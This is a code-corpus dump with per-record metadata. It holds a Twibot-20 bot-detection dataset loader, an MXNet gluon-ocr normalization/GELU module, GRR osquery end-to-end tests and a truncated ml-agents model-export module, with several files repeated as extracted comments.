from torch.utils.data import Dataset


class Twibot20(Dataset):
    """Loader/preprocessor for the Twibot-20 bot-detection dataset.

    Builds the inputs BotRGCN expects -- description embeddings, tweet
    embeddings, numerical and categorical profile features, and the
    follower/following graph -- and caches each as a tensor file under
    `root` so the expensive steps run only once.
    """

    def __init__(self, root='./Data/', device='cpu', process=True, save=True):
        self.root = root
        self.device = device
        if process:
            print('Loading train.json')
            df_train = pd.read_json('./Twibot-20/train.json')
            print('Loading test.json')
            df_test = pd.read_json('./Twibot-20/test.json')
            print('Loading support.json')
            df_support = pd.read_json('./Twibot-20/support.json')
            print('Loading dev.json')
            df_dev = pd.read_json('./Twibot-20/dev.json')
            print('Finished')
            # Keep the [ID, profile, tweet, neighbor, label] columns; the
            # support split has no label column, so one is added below.
            df_train = df_train.iloc[:, [0, 1, 2, 3, 5]]
            df_test = df_test.iloc[:, [0, 1, 2, 3, 5]]
            df_support = df_support.iloc[:, [0, 1, 2, 3]]
            df_dev = df_dev.iloc[:, [0, 1, 2, 3, 5]]
            df_support['label'] = 'None'
            # Labeled users (train/dev/test) come first so the index ranges in
            # train_val_test_mask() line up; support users are appended after.
            self.df_data_labeled = pd.concat([df_train, df_dev, df_test], ignore_index=True)
            self.df_data = pd.concat([df_train, df_dev, df_test, df_support], ignore_index=True)
        self.save = save

    def load_labels(self):
        """Return the label tensor for labeled users, cached at root/label.pt."""
        print('Loading labels...', end='   ')
        path = self.root + 'label.pt'
        if not os.path.exists(path):
            labels = torch.LongTensor(self.df_data_labeled['label']).to(self.device)
            if self.save:
                # Fixed: save to the computed path so a non-default root works
                torch.save(labels, path)
        else:
            labels = torch.load(path).to(self.device)
        print('Finished')
        return labels

    def Des_Preprocess(self):
        """Collect each user's profile description ('None' if absent) into
        a numpy array cached at root/description.npy."""
        print('Loading raw feature1...', end='   ')
        path = self.root + 'description.npy'
        if not os.path.exists(path):
            description = []
            for i in range(self.df_data.shape[0]):
                if self.df_data['profile'][i] is None or self.df_data['profile'][i]['description'] is None:
                    description.append('None')
                else:
                    description.append(self.df_data['profile'][i]['description'])
            description = np.array(description)
            if self.save:
                np.save(path, description)
        else:
            description = np.load(path, allow_pickle=True)
        print('Finished')
        return description

    def Des_embbeding(self):
        """Embed each description with distilroberta (mean over token vectors).

        The misspelled method name is kept for backward compatibility.
        """
        print('Running feature1 embedding')
        path = self.root + "des_tensor.pt"
        if not os.path.exists(path):
            description = np.load(self.root + 'description.npy', allow_pickle=True)
            print('Loading RoBerta')
            feature_extraction = pipeline('feature-extraction', model="distilroberta-base",
                                          tokenizer="distilroberta-base", device=0)
            des_vec = []
            for (j, each) in enumerate(description):
                feature = torch.Tensor(feature_extraction(each))
                # Manual running sum over token embeddings, then divide:
                # equivalent to feature[0].mean(dim=0)
                for (i, tensor) in enumerate(feature[0]):
                    if i == 0:
                        feature_tensor = tensor
                    else:
                        feature_tensor += tensor
                feature_tensor /= feature.shape[1]
                des_vec.append(feature_tensor)
                if (j % 1000 == 0):
                    print('[{:>6d}/229580]'.format(j + 1))
            des_tensor = torch.stack(des_vec, 0).to(self.device)
            if self.save:
                # Fixed: save to the computed path so a non-default root works
                torch.save(des_tensor, path)
        else:
            des_tensor = torch.load(path).to(self.device)
        print('Finished')
        return des_tensor

    def tweets_preprocess(self):
        """Collect each user's tweet list (a single '' if absent) into a
        numpy array cached at root/tweets.npy."""
        print('Loading raw feature2...', end='   ')
        path = self.root + 'tweets.npy'
        if not os.path.exists(path):
            tweets = []
            for i in range(self.df_data.shape[0]):
                one_usr_tweets = []
                if self.df_data['tweet'][i] is None:
                    one_usr_tweets.append('')
                else:
                    for each in self.df_data['tweet'][i]:
                        one_usr_tweets.append(each)
                tweets.append(one_usr_tweets)
            tweets = np.array(tweets)
            if self.save:
                np.save(path, tweets)
        else:
            tweets = np.load(path, allow_pickle=True)
        print('Finished')
        return tweets

    def tweets_embedding(self):
        """Embed up to 10 tweets per user with roberta-base and average them.

        Fixed: the freshly-computed branch previously stored the result in
        `tweet_tensor` but returned the undefined name `tweets_tensor`,
        raising NameError whenever the cache file did not yet exist.
        """
        print('Running feature2 embedding')
        path = self.root + "tweets_tensor.pt"
        if not os.path.exists(path):
            # Fixed: honor self.root instead of hard-coding ./Data/
            tweets = np.load(self.root + "tweets.npy", allow_pickle=True)
            print('Loading RoBerta')
            feature_extract = pipeline('feature-extraction', model='roberta-base', tokenizer='roberta-base',
                                       device=0, padding=True, truncation=True, max_length=500,
                                       add_special_tokens=True)
            tweets_list = []
            for i, each_person_tweets in enumerate(tweets):
                for j, each_tweet in enumerate(each_person_tweets):
                    each_tweet_tensor = torch.tensor(feature_extract(each_tweet))
                    # Mean over token embeddings for this tweet
                    for k, each_word_tensor in enumerate(each_tweet_tensor[0]):
                        if k == 0:
                            total_word_tensor = each_word_tensor
                        else:
                            total_word_tensor += each_word_tensor
                    total_word_tensor /= each_tweet_tensor.shape[1]
                    # Accumulate at most the first 10 tweets per user
                    if j == 0:
                        total_each_person_tweets = total_word_tensor
                    elif j == 10:
                        break
                    else:
                        total_each_person_tweets += total_word_tensor
                if j == 10:
                    total_each_person_tweets /= 10
                else:
                    total_each_person_tweets /= len(each_person_tweets)
                tweets_list.append(total_each_person_tweets)
                if (i % 500 == 0):
                    print('[{:>6d}/229580]'.format(i + 1))
            tweets_tensor = torch.stack(tweets_list).to(self.device)
            if self.save:
                torch.save(tweets_tensor, path)
        else:
            tweets_tensor = torch.load(path).to(self.device)
        print('Finished')
        return tweets_tensor

    def num_prop_preprocess(self):
        """Build the 6-column z-scored numeric feature matrix
        [followers, friends, favourites, statuses, screen-name length,
        account age in days], cached at root/num_prop.pt."""
        print('Processing feature3...', end='   ')
        path0 = self.root + 'num_prop.pt'
        if not os.path.exists(path0):
            path = self.root
            if not os.path.exists(path + "followers_count.pt"):
                followers_count = []
                for i in range(self.df_data.shape[0]):
                    if self.df_data['profile'][i] is None or self.df_data['profile'][i]['followers_count'] is None:
                        followers_count.append(0)
                    else:
                        followers_count.append(self.df_data['profile'][i]['followers_count'])
                followers_count = torch.tensor(np.array(followers_count, dtype=np.float32)).to(self.device)
                if self.save:
                    torch.save(followers_count, path + "followers_count.pt")

                friends_count = []
                for i in range(self.df_data.shape[0]):
                    if self.df_data['profile'][i] is None or self.df_data['profile'][i]['friends_count'] is None:
                        friends_count.append(0)
                    else:
                        friends_count.append(self.df_data['profile'][i]['friends_count'])
                friends_count = torch.tensor(np.array(friends_count, dtype=np.float32)).to(self.device)
                if self.save:
                    torch.save(friends_count, path + 'friends_count.pt')

                screen_name_length = []
                for i in range(self.df_data.shape[0]):
                    if self.df_data['profile'][i] is None or self.df_data['profile'][i]['screen_name'] is None:
                        screen_name_length.append(0)
                    else:
                        screen_name_length.append(len(self.df_data['profile'][i]['screen_name']))
                screen_name_length = torch.tensor(np.array(screen_name_length, dtype=np.float32)).to(self.device)
                if self.save:
                    torch.save(screen_name_length, path + 'screen_name_length.pt')

                favourites_count = []
                for i in range(self.df_data.shape[0]):
                    if self.df_data['profile'][i] is None or self.df_data['profile'][i]['favourites_count'] is None:
                        favourites_count.append(0)
                    else:
                        favourites_count.append(self.df_data['profile'][i]['favourites_count'])
                favourites_count = torch.tensor(np.array(favourites_count, dtype=np.float32)).to(self.device)
                if self.save:
                    torch.save(favourites_count, path + 'favourites_count.pt')

                active_days = []
                # Reference date for account age; the trailing spaces in both
                # strings are deliberate and must match the format string.
                date0 = dt.strptime('Tue Sep 1 00:00:00 +0000 2020 ', '%a %b %d %X %z %Y ')
                for i in range(self.df_data.shape[0]):
                    if self.df_data['profile'][i] is None or self.df_data['profile'][i]['created_at'] is None:
                        active_days.append(0)
                    else:
                        date = dt.strptime(self.df_data['profile'][i]['created_at'], '%a %b %d %X %z %Y ')
                        active_days.append((date0 - date).days)
                active_days = torch.tensor(np.array(active_days, dtype=np.float32)).to(self.device)
                if self.save:
                    torch.save(active_days, path + 'active_days.pt')

                statuses_count = []
                for i in range(self.df_data.shape[0]):
                    if self.df_data['profile'][i] is None or self.df_data['profile'][i]['statuses_count'] is None:
                        statuses_count.append(0)
                    else:
                        statuses_count.append(int(self.df_data['profile'][i]['statuses_count']))
                statuses_count = torch.tensor(np.array(statuses_count, dtype=np.float32)).to(self.device)
                if self.save:
                    torch.save(statuses_count, path + 'statuses_count.pt')
            else:
                active_days = torch.load(path + "active_days.pt")
                screen_name_length = torch.load(path + "screen_name_length.pt")
                favourites_count = torch.load(path + "favourites_count.pt")
                followers_count = torch.load(path + "followers_count.pt")
                friends_count = torch.load(path + "friends_count.pt")
                statuses_count = torch.load(path + "statuses_count.pt")

            # z-score each column via pandas, then rebuild tensors
            active_days = pd.Series(active_days.to('cpu').detach().numpy())
            active_days = (active_days - active_days.mean()) / active_days.std()
            active_days = torch.tensor(np.array(active_days))
            screen_name_length = pd.Series(screen_name_length.to('cpu').detach().numpy())
            screen_name_length_days = (screen_name_length - screen_name_length.mean()) / screen_name_length.std()
            screen_name_length_days = torch.tensor(np.array(screen_name_length_days))
            favourites_count = pd.Series(favourites_count.to('cpu').detach().numpy())
            favourites_count = (favourites_count - favourites_count.mean()) / favourites_count.std()
            favourites_count = torch.tensor(np.array(favourites_count))
            followers_count = pd.Series(followers_count.to('cpu').detach().numpy())
            followers_count = (followers_count - followers_count.mean()) / followers_count.std()
            followers_count = torch.tensor(np.array(followers_count))
            friends_count = pd.Series(friends_count.to('cpu').detach().numpy())
            friends_count = (friends_count - friends_count.mean()) / friends_count.std()
            friends_count = torch.tensor(np.array(friends_count))
            statuses_count = pd.Series(statuses_count.to('cpu').detach().numpy())
            statuses_count = (statuses_count - statuses_count.mean()) / statuses_count.std()
            statuses_count = torch.tensor(np.array(statuses_count))

            # 229580 = total number of users in Twibot-20 (labeled + support)
            num_prop = torch.cat((followers_count.reshape([229580, 1]),
                                  friends_count.reshape([229580, 1]),
                                  favourites_count.reshape([229580, 1]),
                                  statuses_count.reshape([229580, 1]),
                                  screen_name_length_days.reshape([229580, 1]),
                                  active_days.reshape([229580, 1])), 1).to(self.device)
            if self.save:
                # Fixed: save to the computed path so a non-default root works
                torch.save(num_prop, path0)
        else:
            num_prop = torch.load(path0).to(self.device)
        print('Finished')
        return num_prop

    def cat_prop_preprocess(self):
        """Build the 11-column boolean profile-flag matrix, cached at
        root/category_properties.pt."""
        print('Processing feature4...', end='   ')
        path = self.root + 'category_properties.pt'
        if not os.path.exists(path):
            category_properties = []
            properties = ['protected', 'geo_enabled', 'verified', 'contributors_enabled', 'is_translator',
                          'is_translation_enabled', 'profile_background_tile', 'profile_use_background_image',
                          'has_extended_profile', 'default_profile', 'default_profile_image']
            for i in range(self.df_data.shape[0]):
                prop = []
                if self.df_data['profile'][i] is None:
                    # Fixed: the inner loop previously reused `i`, clobbering
                    # the outer row index and skipping users
                    for _ in range(11):
                        prop.append(0)
                else:
                    for each in properties:
                        if self.df_data['profile'][i][each] is None:
                            prop.append(0)
                        else:
                            # NOTE(review): the raw field values appear to carry
                            # a trailing space ("True ") -- do not strip without
                            # verifying against the dataset files.
                            if self.df_data['profile'][i][each] == "True ":
                                prop.append(1)
                            else:
                                prop.append(0)
                prop = np.array(prop)
                category_properties.append(prop)
            category_properties = torch.tensor(np.array(category_properties, dtype=np.float32)).to(self.device)
            if self.save:
                torch.save(category_properties, path)
        else:
            category_properties = torch.load(path).to(self.device)
        print('Finished')
        return category_properties

    def Build_Graph(self):
        """Build the follower/following edge list.

        Edge type 0 = 'following', 1 = 'follower'; neighbors whose ID is not
        in the dataset are skipped. Cached at root/edge_index.pt and
        root/edge_type.pt.
        """
        print('Building graph', end='   ')
        path = self.root + 'edge_index.pt'
        if not os.path.exists(path):
            id2index_dict = {id: index for index, id in enumerate(self.df_data['ID'])}
            edge_index = []
            edge_type = []
            for i, relation in enumerate(self.df_data['neighbor']):
                if relation is not None:
                    for each_id in relation['following']:
                        try:
                            target_id = id2index_dict[int(each_id)]
                        except KeyError:
                            continue
                        else:
                            edge_index.append([i, target_id])
                            edge_type.append(0)
                    for each_id in relation['follower']:
                        try:
                            target_id = id2index_dict[int(each_id)]
                        except KeyError:
                            continue
                        else:
                            edge_index.append([i, target_id])
                            edge_type.append(1)
                else:
                    continue
            edge_index = torch.tensor(edge_index, dtype=torch.long).t().contiguous().to(self.device)
            edge_type = torch.tensor(edge_type, dtype=torch.long).to(self.device)
            if self.save:
                torch.save(edge_index, self.root + "edge_index.pt")
                torch.save(edge_type, self.root + "edge_type.pt")
        else:
            edge_index = torch.load(self.root + "edge_index.pt").to(self.device)
            edge_type = torch.load(self.root + "edge_type.pt").to(self.device)
        print('Finished')
        return edge_index, edge_type

    def train_val_test_mask(self):
        """Fixed index splits: 8278 train / 2365 val / 1183 test users."""
        train_idx = range(8278)
        val_idx = range(8278, 8278 + 2365)
        test_idx = range(8278 + 2365, 8278 + 2365 + 1183)
        return train_idx, val_idx, test_idx

    def dataloader(self):
        """Run the full pipeline and return every model input plus splits."""
        labels = self.load_labels()
        self.Des_Preprocess()
        des_tensor = self.Des_embbeding()
        self.tweets_preprocess()
        tweets_tensor = self.tweets_embedding()
        num_prop = self.num_prop_preprocess()
        category_prop = self.cat_prop_preprocess()
        edge_index, edge_type = self.Build_Graph()
        train_idx, val_idx, test_idx = self.train_val_test_mask()
        return des_tensor, tweets_tensor, num_prop, category_prop, edge_index, edge_type, labels, train_idx, val_idx, test_idx
none
1
2.48024
2
gluonocr/nn/block.py
Davids929/gluon-ocr
2
6627895
<filename>gluonocr/nn/block.py # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """Building blocks and utility for models.""" __all__ = ['L2Normalization', 'GELU'] import math from mxnet import ndarray from mxnet.gluon import Block, HybridBlock class L2Normalization(HybridBlock): """Normalize the input array by dividing the L2 norm along the given axis. ..code out = data / (sqrt(sum(data**2, axis)) + eps) Parameters ---------- axis : int, default -1 The axis to compute the norm value. eps : float, default 1E-6 The epsilon value to avoid dividing zero """ def __init__(self, axis=-1, eps=1E-6, **kwargs): super(L2Normalization, self).__init__(**kwargs) self._axis = axis self._eps = eps def hybrid_forward(self, F, x): # pylint: disable=arguments-differ ret = F.broadcast_div(x, F.norm(x, axis=self._axis, keepdims=True) + self._eps) return ret class GELU(HybridBlock): """Gaussian Error Linear Unit. This is a smoother version of the RELU. https://arxiv.org/abs/1606.08415 Parameters ---------- approximate : bool, default False If True, use tanh approximation to calculate gelu. If False, use erf. 
""" def __init__(self, approximate=False, prefix=None, params=None): super().__init__(prefix=prefix, params=params) self._approximate = approximate def hybrid_forward(self, F, x): # pylint: disable=arguments-differ """ Parameters ---------- Inputs: - **data**: input tensor with arbitrary shape. Outputs: - **out**: output tensor with the same shape as `data`. """ if not self._approximate: return F.LeakyReLU(x, act_type='gelu') else: return 0.5 * x * (1 + F.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * (x ** 3)))) def __repr__(self): s = '{name}()' return s.format(name=self.__class__.__name__)
<filename>gluonocr/nn/block.py # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """Building blocks and utility for models.""" __all__ = ['L2Normalization', 'GELU'] import math from mxnet import ndarray from mxnet.gluon import Block, HybridBlock class L2Normalization(HybridBlock): """Normalize the input array by dividing the L2 norm along the given axis. ..code out = data / (sqrt(sum(data**2, axis)) + eps) Parameters ---------- axis : int, default -1 The axis to compute the norm value. eps : float, default 1E-6 The epsilon value to avoid dividing zero """ def __init__(self, axis=-1, eps=1E-6, **kwargs): super(L2Normalization, self).__init__(**kwargs) self._axis = axis self._eps = eps def hybrid_forward(self, F, x): # pylint: disable=arguments-differ ret = F.broadcast_div(x, F.norm(x, axis=self._axis, keepdims=True) + self._eps) return ret class GELU(HybridBlock): """Gaussian Error Linear Unit. This is a smoother version of the RELU. https://arxiv.org/abs/1606.08415 Parameters ---------- approximate : bool, default False If True, use tanh approximation to calculate gelu. If False, use erf. 
""" def __init__(self, approximate=False, prefix=None, params=None): super().__init__(prefix=prefix, params=params) self._approximate = approximate def hybrid_forward(self, F, x): # pylint: disable=arguments-differ """ Parameters ---------- Inputs: - **data**: input tensor with arbitrary shape. Outputs: - **out**: output tensor with the same shape as `data`. """ if not self._approximate: return F.LeakyReLU(x, act_type='gelu') else: return 0.5 * x * (1 + F.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * (x ** 3)))) def __repr__(self): s = '{name}()' return s.format(name=self.__class__.__name__)
en
0.725487
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. Building blocks and utility for models. Normalize the input array by dividing the L2 norm along the given axis. ..code out = data / (sqrt(sum(data**2, axis)) + eps) Parameters ---------- axis : int, default -1 The axis to compute the norm value. eps : float, default 1E-6 The epsilon value to avoid dividing zero # pylint: disable=arguments-differ Gaussian Error Linear Unit. This is a smoother version of the RELU. https://arxiv.org/abs/1606.08415 Parameters ---------- approximate : bool, default False If True, use tanh approximation to calculate gelu. If False, use erf. # pylint: disable=arguments-differ Parameters ---------- Inputs: - **data**: input tensor with arbitrary shape. Outputs: - **out**: output tensor with the same shape as `data`.
2.313449
2
grr/test/grr_response_test/end_to_end_tests/tests/osquery.py
tsehori/grr
1
6627896
#!/usr/bin/env python """E2E tests for the osquery flow.""" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals from grr_response_test.end_to_end_tests import test_base class TestOsquery(test_base.EndToEndTest): """Class with generic osquery tests runnable on every platform.""" MANUAL = True platforms = test_base.EndToEndTest.Platform.ALL def testOsVersion(self): args = self.grr_api.types.CreateFlowArgs("OsqueryFlow") args.query = """SELECT name FROM os_version;""" args.ignore_stderr_errors = True # Windows client prints spurious warnings. flow = self.RunFlowAndWait("OsqueryFlow", args=args) results = list(flow.ListResults()) self.assertLen(results, 1) table = results[0].payload.table self.assertEqual(table.query, args.query) self.assertLen(table.header.columns, 1) self.assertEqual(table.header.columns[0].name, "name") self.assertLen(table.rows, 1) self.assertLen(table.rows[0].values, 1) os_name = table.rows[0].values[0] if self.platform == test_base.EndToEndTest.Platform.DARWIN: self.assertEqual(os_name, "Mac OS X") elif self.platform == test_base.EndToEndTest.Platform.LINUX: # e.g. for Debian it is 'Debian GNU/Linux'. self.assertIn("Linux", os_name) elif self.platform == test_base.EndToEndTest.Platform.WINDOWS: # e.g. 'Microsoft Windows 10 Enterprise' self.assertIn("Windows", os_name) else: self.fail("Unexpected platform: {}".format(self.platform)) def testProcesses(self): args = self.grr_api.types.CreateFlowArgs("OsqueryFlow") args.query = """ SELECT path FROM osquery_info JOIN processes ON osquery_info.pid = processes.pid; """ args.ignore_stderr_errors = True # Windows client prints spurious warnings. 
flow = self.RunFlowAndWait("OsqueryFlow", args=args) results = list(flow.ListResults()) self.assertLen(results, 1) table = results[0].payload.table self.assertEqual(table.query, args.query) self.assertLen(table.header.columns, 1) self.assertEqual(table.header.columns[0].name, "path") self.assertLen(table.rows, 1) self.assertLen(table.rows[0].values, 1) # We are not sure about the path, but the executable should contain name # `osquery.exe` (e.g. on Windows we use `osqueryd` but on Linux and macOS we # use `osqueryi`. path = table.rows[0].values[0] self.assertIn("osquery", path)
#!/usr/bin/env python """E2E tests for the osquery flow.""" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals from grr_response_test.end_to_end_tests import test_base class TestOsquery(test_base.EndToEndTest): """Class with generic osquery tests runnable on every platform.""" MANUAL = True platforms = test_base.EndToEndTest.Platform.ALL def testOsVersion(self): args = self.grr_api.types.CreateFlowArgs("OsqueryFlow") args.query = """SELECT name FROM os_version;""" args.ignore_stderr_errors = True # Windows client prints spurious warnings. flow = self.RunFlowAndWait("OsqueryFlow", args=args) results = list(flow.ListResults()) self.assertLen(results, 1) table = results[0].payload.table self.assertEqual(table.query, args.query) self.assertLen(table.header.columns, 1) self.assertEqual(table.header.columns[0].name, "name") self.assertLen(table.rows, 1) self.assertLen(table.rows[0].values, 1) os_name = table.rows[0].values[0] if self.platform == test_base.EndToEndTest.Platform.DARWIN: self.assertEqual(os_name, "Mac OS X") elif self.platform == test_base.EndToEndTest.Platform.LINUX: # e.g. for Debian it is 'Debian GNU/Linux'. self.assertIn("Linux", os_name) elif self.platform == test_base.EndToEndTest.Platform.WINDOWS: # e.g. 'Microsoft Windows 10 Enterprise' self.assertIn("Windows", os_name) else: self.fail("Unexpected platform: {}".format(self.platform)) def testProcesses(self): args = self.grr_api.types.CreateFlowArgs("OsqueryFlow") args.query = """ SELECT path FROM osquery_info JOIN processes ON osquery_info.pid = processes.pid; """ args.ignore_stderr_errors = True # Windows client prints spurious warnings. 
flow = self.RunFlowAndWait("OsqueryFlow", args=args) results = list(flow.ListResults()) self.assertLen(results, 1) table = results[0].payload.table self.assertEqual(table.query, args.query) self.assertLen(table.header.columns, 1) self.assertEqual(table.header.columns[0].name, "path") self.assertLen(table.rows, 1) self.assertLen(table.rows[0].values, 1) # We are not sure about the path, but the executable should contain name # `osquery.exe` (e.g. on Windows we use `osqueryd` but on Linux and macOS we # use `osqueryi`. path = table.rows[0].values[0] self.assertIn("osquery", path)
en
0.722945
#!/usr/bin/env python E2E tests for the osquery flow. Class with generic osquery tests runnable on every platform. SELECT name FROM os_version; # Windows client prints spurious warnings. # e.g. for Debian it is 'Debian GNU/Linux'. # e.g. 'Microsoft Windows 10 Enterprise' SELECT path FROM osquery_info JOIN processes ON osquery_info.pid = processes.pid; # Windows client prints spurious warnings. # We are not sure about the path, but the executable should contain name # `osquery.exe` (e.g. on Windows we use `osqueryd` but on Linux and macOS we # use `osqueryi`.
2.225316
2
ml-agents/mlagents/model_serialization.py
bobcy2015/ml-agents
1
6627897
<gh_stars>1-10 from distutils.util import strtobool import os from typing import Any, List, Set, NamedTuple from distutils.version import LooseVersion try: import onnx from tf2onnx.tfonnx import process_tf_graph, tf_optimize from tf2onnx import optimizer ONNX_EXPORT_ENABLED = True except ImportError: # Either onnx and tf2onnx not installed, or they're not compatible with the version of tensorflow ONNX_EXPORT_ENABLED = False pass from mlagents.tf_utils import tf from tensorflow.python.platform import gfile from tensorflow.python.framework import graph_util from mlagents_envs.logging_util import get_logger from mlagents.trainers import tensorflow_to_barracuda as tf2bc if LooseVersion(tf.__version__) < LooseVersion("1.12.0"): # ONNX is only tested on 1.12.0 and later ONNX_EXPORT_ENABLED = False logger = get_logger(__name__) POSSIBLE_INPUT_NODES = frozenset( [ "action_masks", "epsilon", "prev_action", "recurrent_in", "sequence_length", "vector_observation", ] ) POSSIBLE_OUTPUT_NODES = frozenset( ["action", "action_probs", "recurrent_out", "value_estimate"] ) MODEL_CONSTANTS = frozenset( [ "action_output_shape", "is_continuous_control", "memory_size", "version_number", "trainer_major_version", "trainer_minor_version", "trainer_patch_version", ] ) VISUAL_OBSERVATION_PREFIX = "visual_observation_" class SerializationSettings(NamedTuple): model_path: str brain_name: str convert_to_barracuda: bool = True convert_to_onnx: bool = True onnx_opset: int = 9 def export_policy_model( settings: SerializationSettings, graph: tf.Graph, sess: tf.Session ) -> None: """ Exports latest saved model to .nn format for Unity embedding. 
""" frozen_graph_def = _make_frozen_graph(settings, graph, sess) # Save frozen graph frozen_graph_def_path = settings.model_path + "/frozen_graph_def.pb" with gfile.GFile(frozen_graph_def_path, "wb") as f: f.write(frozen_graph_def.SerializeToString()) # Convert to barracuda if settings.convert_to_barracuda: tf2bc.convert(frozen_graph_def_path, settings.model_path + ".nn") logger.info(f"Exported {settings.model_path}.nn file") # Save to onnx too (if we were able to import it) if ONNX_EXPORT_ENABLED: if settings.convert_to_onnx: try: onnx_graph = convert_frozen_to_onnx(settings, frozen_graph_def) onnx_output_path = settings.model_path + ".onnx" with open(onnx_output_path, "wb") as f: f.write(onnx_graph.SerializeToString()) logger.info(f"Converting to {onnx_output_path}") except Exception: # Make conversion errors fatal depending on environment variables (only done during CI) if _enforce_onnx_conversion(): raise logger.exception( "Exception trying to save ONNX graph. Please report this error on " "https://github.com/Unity-Technologies/ml-agents/issues and " "attach a copy of frozen_graph_def.pb" ) else: if _enforce_onnx_conversion(): raise RuntimeError( "ONNX conversion enforced, but couldn't import dependencies." ) def _make_frozen_graph( settings: SerializationSettings, graph: tf.Graph, sess: tf.Session ) -> tf.GraphDef: with graph.as_default(): target_nodes = ",".join(_process_graph(settings, graph)) graph_def = graph.as_graph_def() output_graph_def = graph_util.convert_variables_to_constants( sess, graph_def, target_nodes.replace(" ", "").split(",") ) return output_graph_def def convert_frozen_to_onnx( settings: SerializationSettings, frozen_graph_def: tf.GraphDef ) -> Any: # This is basically https://github.com/onnx/tensorflow-onnx/blob/master/tf2onnx/convert.py # Some constants in the graph need to be read by the inference system. # These aren't used by the model anywhere, so trying to make sure they propagate # through conversion and import is a losing battle. 
Instead, save them now, # so that we can add them back later. constant_values = {} for n in frozen_graph_def.node: if n.name in MODEL_CONSTANTS: val = n.attr["value"].tensor.int_val[0] constant_values[n.name] = val inputs = _get_input_node_names(frozen_graph_def) outputs = _get_output_node_names(frozen_graph_def) logger.info(f"onnx export - inputs:{inputs} outputs:{outputs}") frozen_graph_def = tf_optimize( inputs, outputs, frozen_graph_def, fold_constant=True ) with tf.Graph().as_default() as tf_graph: tf.import_graph_def(frozen_graph_def, name="") with tf.Session(graph=tf_graph): g = process_tf_graph( tf_graph, input_names=inputs, output_names=outputs, opset=settings.onnx_opset, ) onnx_graph = optimizer.optimize_graph(g) model_proto = onnx_graph.make_model(settings.brain_name) # Save the constant values back the graph initializer. # This will ensure the importer gets them as global constants. constant_nodes = [] for k, v in constant_values.items(): constant_node = _make_onnx_node_for_constant(k, v) constant_nodes.append(constant_node) model_proto.graph.initializer.extend(constant_nodes) return model_proto def _make_onnx_node_for_constant(name: str, value: int) -> Any: tensor_value = onnx.TensorProto( data_type=onnx.TensorProto.INT32, name=name, int32_data=[value], dims=[1, 1, 1, 1], ) return tensor_value def _get_input_node_names(frozen_graph_def: Any) -> List[str]: """ Get the list of input node names from the graph. 
Names are suffixed with ":0" """ node_names = _get_frozen_graph_node_names(frozen_graph_def) input_names = node_names & POSSIBLE_INPUT_NODES # Check visual inputs sequentially, and exit as soon as we don't find one vis_index = 0 while True: vis_node_name = f"{VISUAL_OBSERVATION_PREFIX}{vis_index}" if vis_node_name in node_names: input_names.add(vis_node_name) else: break vis_index += 1 # Append the port return [f"{n}:0" for n in input_names] def _get_output_node_names(frozen_graph_def: Any) -> List[str]: """ Get the list of output node names from the graph. Names are suffixed with ":0" """ node_names = _get_frozen_graph_node_names(frozen_graph_def) output_names = node_names & POSSIBLE_OUTPUT_NODES # Append the port return [f"{n}:0" for n in output_names] def _get_frozen_graph_node_names(frozen_graph_def: Any) -> Set[str]: """ Get all the node names from the graph. """ names = set() for node in frozen_graph_def.node: names.add(node.name) return names def _process_graph(settings: SerializationSettings, graph: tf.Graph) -> List[str]: """ Gets the list of the output nodes present in the graph for inference :return: list of node names """ all_nodes = [x.name for x in graph.as_graph_def().node] nodes = [x for x in all_nodes if x in POSSIBLE_OUTPUT_NODES | MODEL_CONSTANTS] logger.info("List of nodes to export for brain :" + settings.brain_name) for n in nodes: logger.info("\t" + n) return nodes def _enforce_onnx_conversion() -> bool: env_var_name = "TEST_ENFORCE_ONNX_CONVERSION" if env_var_name not in os.environ: return False val = os.environ[env_var_name] try: # This handles e.g. "false" converting reasonably to False return strtobool(val) except Exception: return False
from distutils.util import strtobool import os from typing import Any, List, Set, NamedTuple from distutils.version import LooseVersion try: import onnx from tf2onnx.tfonnx import process_tf_graph, tf_optimize from tf2onnx import optimizer ONNX_EXPORT_ENABLED = True except ImportError: # Either onnx and tf2onnx not installed, or they're not compatible with the version of tensorflow ONNX_EXPORT_ENABLED = False pass from mlagents.tf_utils import tf from tensorflow.python.platform import gfile from tensorflow.python.framework import graph_util from mlagents_envs.logging_util import get_logger from mlagents.trainers import tensorflow_to_barracuda as tf2bc if LooseVersion(tf.__version__) < LooseVersion("1.12.0"): # ONNX is only tested on 1.12.0 and later ONNX_EXPORT_ENABLED = False logger = get_logger(__name__) POSSIBLE_INPUT_NODES = frozenset( [ "action_masks", "epsilon", "prev_action", "recurrent_in", "sequence_length", "vector_observation", ] ) POSSIBLE_OUTPUT_NODES = frozenset( ["action", "action_probs", "recurrent_out", "value_estimate"] ) MODEL_CONSTANTS = frozenset( [ "action_output_shape", "is_continuous_control", "memory_size", "version_number", "trainer_major_version", "trainer_minor_version", "trainer_patch_version", ] ) VISUAL_OBSERVATION_PREFIX = "visual_observation_" class 